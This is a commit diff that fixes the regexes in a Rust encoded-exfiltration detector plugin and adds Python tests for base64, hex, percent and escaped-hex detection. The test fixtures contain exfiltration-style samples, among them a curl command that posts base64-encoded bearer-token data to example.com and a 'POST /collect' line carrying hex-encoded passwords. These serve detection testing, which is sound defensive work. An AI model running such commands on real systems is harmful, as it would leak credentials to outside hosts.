Skip to content

Commit 0daad47

Browse files
authored
fix: encoded exfil detector regex and boundary validation (#3379)
- Use core-only regex patterns for base64, base64url, hex (Rust regex crate does not support lookbehind/lookahead). - Add has_valid_boundaries() and validate in scan_text so adjacent encoded strings are both detected and false positives avoided. - Fix printable_ratio filter for current Rust. - Add Rust test test_scan_text_detects_adjacent_matches. - Add Python tests: word boundaries, base64url, percent/escaped hex, no false positives (URLs, alphanumeric); run in Python and Rust modes. Signed-off-by: Luca <lucarlig@protonmail.com>
1 parent b4d8770 commit 0daad47

File tree

2 files changed

+137
-16
lines changed

2 files changed

+137
-16
lines changed

plugins_rust/encoded_exfil_detection/src/lib.rs

Lines changed: 62 additions & 16 deletions
Original file line numberDiff line numberDiff line change
@@ -7,18 +7,18 @@ use std::collections::HashMap;
77
use std::sync::LazyLock;
88

99
static BASE64_RE: LazyLock<Regex> = LazyLock::new(|| {
10-
Regex::new(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")
11-
.expect("failed to compile BASE64_RE")
10+
// Match core pattern only; validate boundaries in code (Rust regex has no lookbehind/lookahead)
11+
Regex::new(r"[A-Za-z0-9+/]{16,}={0,2}").expect("failed to compile BASE64_RE")
1212
});
1313

1414
static BASE64URL_RE: LazyLock<Regex> = LazyLock::new(|| {
15-
Regex::new(r"(?<![A-Za-z0-9_\-])[A-Za-z0-9_\-]{16,}={0,2}(?![A-Za-z0-9_\-])")
16-
.expect("failed to compile BASE64URL_RE")
15+
// Match core pattern only; validate boundaries in code
16+
Regex::new(r"[A-Za-z0-9_\-]{16,}={0,2}").expect("failed to compile BASE64URL_RE")
1717
});
1818

1919
static HEX_RE: LazyLock<Regex> = LazyLock::new(|| {
20-
Regex::new(r"(?<![A-Fa-f0-9])[A-Fa-f0-9]{24,}(?![A-Fa-f0-9])")
21-
.expect("failed to compile HEX_RE")
20+
// Match core pattern only; validate boundaries in code
21+
Regex::new(r"[A-Fa-f0-9]{24,}").expect("failed to compile HEX_RE")
2222
});
2323

2424
static PERCENT_RE: LazyLock<Regex> = LazyLock::new(|| {
@@ -296,7 +296,7 @@ fn printable_ratio(data: &[u8]) -> f64 {
296296

297297
let printable = data
298298
.iter()
299-
.filter(|byte| (32..=126).contains(byte) || **byte == b'\n' || **byte == b'\r' || **byte == b'\t')
299+
.filter(|byte| (32..=126).contains(*byte) || **byte == b'\n' || **byte == b'\r' || **byte == b'\t')
300300
.count();
301301

302302
printable as f64 / data.len() as f64
@@ -322,6 +322,31 @@ fn has_egress_context(text: &str, start: usize, end: usize) -> bool {
322322
EGRESS_HINTS.iter().any(|hint| window.contains(hint))
323323
}
324324

325+
/// Validate that a match has proper word boundaries (not part of a larger alphanumeric sequence).
326+
/// Rust regex crate does not support lookbehind/lookahead; this prevents false positives and
327+
/// allows adjacent matches without consuming boundary chars.
328+
fn has_valid_boundaries(text: &str, start: usize, end: usize, core_chars: &str) -> bool {
329+
let bytes = text.as_bytes();
330+
331+
if start > 0 {
332+
let prev_char = bytes[start - 1] as char;
333+
let boundary_chars = core_chars.replace('=', "");
334+
if boundary_chars.contains(prev_char) {
335+
return false;
336+
}
337+
}
338+
339+
if end < bytes.len() {
340+
let next_char = bytes[end] as char;
341+
let boundary_chars = core_chars.replace('=', "");
342+
if boundary_chars.contains(next_char) {
343+
return false;
344+
}
345+
}
346+
347+
true
348+
}
349+
325350
fn evaluate_candidate(
326351
text: &str,
327352
path: &str,
@@ -437,16 +462,24 @@ fn scan_text(text: &str, path: &str, cfg: &DetectorConfig) -> (String, Vec<Findi
437462
continue;
438463
}
439464

465+
let valid_chars = match encoding {
466+
"base64" => "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
467+
"base64url" => "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-=",
468+
"hex" => "ABCDEFabcdef0123456789",
469+
_ => "",
470+
};
471+
440472
for matched in regex.find_iter(text) {
441-
if let Some(finding) = evaluate_candidate(
442-
text,
443-
path,
444-
encoding,
445-
matched.as_str(),
446-
matched.start(),
447-
matched.end(),
448-
cfg,
449-
) {
473+
let start = matched.start();
474+
let end = matched.end();
475+
476+
if !valid_chars.is_empty() && !has_valid_boundaries(text, start, end, valid_chars) {
477+
continue;
478+
}
479+
480+
if let Some(finding) =
481+
evaluate_candidate(text, path, encoding, matched.as_str(), start, end, cfg)
482+
{
450483
let key = (finding.start, finding.end);
451484
match findings_by_span.get(&key) {
452485
Some(existing) if existing.score >= finding.score => {}
@@ -617,4 +650,17 @@ mod tests {
617650
let (_, findings) = scan_text(text, "", &cfg);
618651
assert!(findings.is_empty());
619652
}
653+
654+
#[test]
655+
fn test_scan_text_detects_adjacent_matches() {
656+
let cfg = DetectorConfig::default();
657+
let encoded1 = STANDARD.encode(b"password=secret-value-one");
658+
let encoded2 = STANDARD.encode(b"token=secret-value-two");
659+
let text = format!("[{}] [{}]", encoded1, encoded2);
660+
let (_, findings) = scan_text(&text, "", &cfg);
661+
662+
assert_eq!(findings.len(), 2, "Expected 2 findings for adjacent base64 strings");
663+
assert_ne!(findings[0].start, findings[1].start);
664+
assert_ne!(findings[0].end, findings[1].end);
665+
}
620666
}

tests/unit/plugins/test_encoded_exfil_detector.py

Lines changed: 75 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -70,6 +70,81 @@ def test_clean_input_no_findings(self, use_rust: bool):
7070
assert findings == []
7171
assert redacted == payload
7272

73+
def test_base64_with_word_boundaries(self, use_rust: bool):
74+
"""Base64 patterns match at word boundaries (spaces, start, end, punctuation)."""
75+
cfg = EncodedExfilDetectorConfig()
76+
encoded = base64.b64encode(b"authorization: bearer secret-token-value").decode()
77+
78+
count1, _, _ = _scan_container({"text": f"data {encoded} end"}, cfg, use_rust=use_rust)
79+
assert count1 >= 1, "Should detect base64 with spaces"
80+
81+
count2, _, _ = _scan_container({"text": f"{encoded} followed by text"}, cfg, use_rust=use_rust)
82+
assert count2 >= 1, "Should detect base64 at start"
83+
84+
count3, _, _ = _scan_container({"text": f"text followed by {encoded}"}, cfg, use_rust=use_rust)
85+
assert count3 >= 1, "Should detect base64 at end"
86+
87+
count4, _, _ = _scan_container(
88+
{"text": f"curl -d '{encoded}' https://example.com"}, cfg, use_rust=use_rust
89+
)
90+
assert count4 >= 1, "Should detect base64 with punctuation"
91+
92+
def test_hex_with_word_boundaries(self, use_rust: bool):
93+
"""Hex patterns match at word boundaries."""
94+
cfg = EncodedExfilDetectorConfig()
95+
hex_data = b"password=secret-value-for-upload".hex()
96+
97+
count1, _, _ = _scan_container({"text": f"data {hex_data} end"}, cfg, use_rust=use_rust)
98+
assert count1 >= 1, "Should detect hex with spaces"
99+
100+
count2, _, _ = _scan_container({"text": f"POST /collect data={hex_data}"}, cfg, use_rust=use_rust)
101+
assert count2 >= 1, "Should detect hex with punctuation"
102+
103+
def test_no_false_positives_in_urls(self, use_rust: bool):
104+
"""Normal URLs without sensitive encoded data should not trigger."""
105+
cfg = EncodedExfilDetectorConfig()
106+
payload = {
107+
"url": "https://example.com/path/to/resource",
108+
"message": "Visit our website at https://example.com",
109+
}
110+
count, _, _ = _scan_container(payload, cfg, use_rust=use_rust)
111+
assert count == 0, "Should not detect normal URLs as encoded exfil"
112+
113+
def test_concatenated_alphanumeric_not_detected(self, use_rust: bool):
114+
"""Long alphanumeric strings that are not valid encodings should not trigger."""
115+
cfg = EncodedExfilDetectorConfig()
116+
payload = {"id": "user123456789abcdefghijklmnopqrstuvwxyz"}
117+
count, _, _ = _scan_container(payload, cfg, use_rust=use_rust)
118+
assert count == 0, "Should not detect random alphanumeric strings"
119+
120+
def test_base64url_detection(self, use_rust: bool):
121+
"""Base64url encoding (uses - and _) is detected."""
122+
cfg = EncodedExfilDetectorConfig()
123+
encoded = base64.urlsafe_b64encode(b"api_key=secret-token-value-here").decode()
124+
count, _, findings = _scan_container({"data": f"token={encoded}"}, cfg, use_rust=use_rust)
125+
assert count >= 1, "Should detect base64url encoding"
126+
assert any(f.get("encoding") in {"base64", "base64url"} for f in findings)
127+
128+
def test_percent_encoding_detection(self, use_rust: bool):
129+
"""Percent-encoded data is detected."""
130+
cfg = EncodedExfilDetectorConfig()
131+
text = "password=secret-value"
132+
percent_encoded = "".join(f"%{ord(c):02x}" for c in text)
133+
count, _, findings = _scan_container(
134+
{"data": f"send {percent_encoded} to server"}, cfg, use_rust=use_rust
135+
)
136+
assert count >= 1, "Should detect percent encoding"
137+
assert any(f.get("encoding") == "percent_encoding" for f in findings)
138+
139+
def test_escaped_hex_detection(self, use_rust: bool):
140+
"""Escaped hex (\\xNN) is detected."""
141+
cfg = EncodedExfilDetectorConfig()
142+
text = "token=secret"
143+
escaped_hex = "".join(f"\\x{ord(c):02x}" for c in text)
144+
count, _, findings = _scan_container({"data": f"payload {escaped_hex}"}, cfg, use_rust=use_rust)
145+
assert count >= 1, "Should detect escaped hex"
146+
assert any(f.get("encoding") == "escaped_hex" for f in findings)
147+
73148

74149
@pytest.mark.asyncio
75150
class TestEncodedExfilPluginHooks:

0 commit comments

Comments
 (0)